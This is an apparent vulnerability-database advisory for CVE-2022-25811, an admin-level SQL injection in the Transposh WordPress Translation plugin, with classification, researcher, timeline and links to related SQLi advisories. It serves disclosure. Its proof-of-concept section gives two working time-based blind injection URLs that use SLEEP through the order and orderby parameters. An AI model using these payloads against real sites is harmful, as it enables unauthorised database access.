Transposh WordPress Translation <= 1.0.8 – Admin+ SQL Injection | CVE 2022-25811

Description

The plugin does not sanitise and escape the order and orderby parameters before using them in a SQL statement, leading to a SQL injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&order=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)
https://example.com/wp-admin/admin.php?page=tp_editor&action=filter-by&orderby=lang+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)

Affects Plugins

transposh-translation-filter-for-wordpress

No known fix

References

CVE

CVE-2022-25811

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

6.8 (medium)

Miscellaneous

Original Researcher

Julien Ahrens

Verified

Yes

WPVDB ID

0e0d2c5f-3396-4a0a-a5c6-6a98de3802c9

Timeline

Publicly Published

2022-07-26 (about 1 years ago)

Added

2022-07-26 (about 1 years ago)

Last Updated

2022-08-25 (about 1 years ago)

Other

Published

Title

Published

2023-06-23

Title

MStore API < 4.0.2 - Unauthenticated SQL Injection

Published

2024-03-26

Title

WordPress Action Network 1.4.3 - Admin+ SQLi

Published

2021-08-24

Title

Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection

Published

2014-08-01

Title

File Groups <= 1.1.2 - SQL Injection

Published

2021-09-13

Title

Poll Maker < 3.4.2 - Unauthenticated Time Based SQL Injection